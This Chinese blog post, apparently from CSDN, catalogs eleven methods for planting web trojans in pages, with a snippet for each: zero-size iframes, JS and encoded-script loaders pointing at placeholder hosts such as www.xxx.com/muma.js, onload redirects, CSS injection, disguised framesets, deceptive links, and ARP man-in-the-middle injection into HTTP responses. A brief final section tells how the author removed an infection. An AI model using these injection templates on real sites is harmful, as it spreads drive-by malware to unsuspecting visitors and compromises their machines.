挂马方法简介

一:框架挂马

<iframe src=地址 width=0 height=0></iframe>

此处地址会直接访问,所以如果是链接到exe文件的下载地址,那就会提示用户下载,用户一旦点击就会下载执行被挂马。

二:js文件挂马

首先将以下代码
document.write("<iframe width='0' height='0' src='地址'></iframe>");
保存为xxx.js,
则JS挂马代码为
<script language=javascript src=xxx.js></script>

三:js变形加密

<SCRIPT language="JScript.Encode" src=http://www.xxx.com/muma.txt></script>
muma.txt可改成任意后缀
四:body挂马

<bodyοnlοad="window.location='地址';"></body>

五:隐蔽挂马

top.document.body.innerHTML = top.document.body.innerHTML +'\r\n

<iframesrc="http://www.xxx.com/muma.htm/"></iframe>';

六:css中挂马

body {
background-image:url('javascript:document.write("<scriptsrc=http://www.XXX.net/muma.js></script>")')}

七:JAJA挂马

<SCRIPT language=javascript>
window.open("地址","","toolbar=no,location=no,directories=no,status=no,

menubar=no,scro llbars=no,width=1,height=1");
</script>

八:图片伪装

<html>
<iframe src="网马地址" height=0width=0></iframe>
<imgsrc="图片地址"></center>
</html>

九:伪装调用:

<frameset rows="444,0"cols="*">
<frame src="打开网页" framborder="no" scrolling="auto"noresize marginwidth="0"margingheight="0">
<frame src="网马地址" frameborder="no" scrolling="no"noresize marginwidth="0"margingheight="0">
</frameset>

十:高级欺骗

<a href=http://www.163.com(迷惑连接地址,显示这个地址指向木马地址)

onMouseOver="www_163_com(); return true;">页面要显示的内容 </a>
<SCRIPT Language="JavaScript">
function www_163_com ()
{
var url="网马地址";
open(url,"NewWindow","toolbar=no,location=no,directories=no,status=no,

menubar=no,scrollbars=no,resizable=no,copyhistory=yes,width=800,height=600,left=10,top=10");
}
</SCRIPT>

十一: 超级网马—通过arp欺骗来直接挂马

原理:arp中间人攻击,实际上相当于做了一次代理。

正常时候: A---->B ,A是访问的正常客户,B是要攻击的服务器,C是被我们控制的主机
arp中间人攻击时候: A---->C---->B
B---->C---->A
实际上,C在这里做了一次代理的作用

那么HTTP请求发过来的时候,C判断下是哪个客户端发过来的包,转发给B,然后B返回HTTP响应的时候,在HTTP响应包中,插入一段挂马的代码,比如<iframe>...之类,再将修改过的包返回的正常的客户A,就起到了一个挂马的作用.在这个过程中,B是没有任何感觉的,直接攻击的是正常的客户A,如果A是管理员或者是目标单位,就直接挂上马了。

如何处理网页木马:

1、找到嵌入的网页木马文件。以下,拿自己的经历说事。找到的文件是wm.htm

2、在注册表中查找wm.htm。很幸运,找到了。开始顺藤摸瓜...

3、修改键值wm.htm为wm_nnd.htm。

4、再次查找wm.htm。很不幸,又查到了。说明有服务程序在作怪。嘿嘿,有意外发现。
cain.exe,据说是密码嗅探器。

5、修改键值cain.exe为cain_nnd.exe。

6、查找cain.exe,仍然可以查到。嘻嘻,在预料之中。

7、怀疑wm.htm与cain.exe同流合污,背后有服务程序作后台。

8、快查查看,系统服务程序。在运行->msconfig 或直接在命令行使用netstart,查看可疑程序

9、发现temp*.exe(全名记不清了),立马net stop server 。

10、快去修改键值wm.htm为wm_nnd.htm,cain.exe为cain_nnd.exe。

11、再次查找wm.htm或cain.exe,没有找到。哈哈,很好。

12、观察了几天,没再发生挂马的现象。


  • 1
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值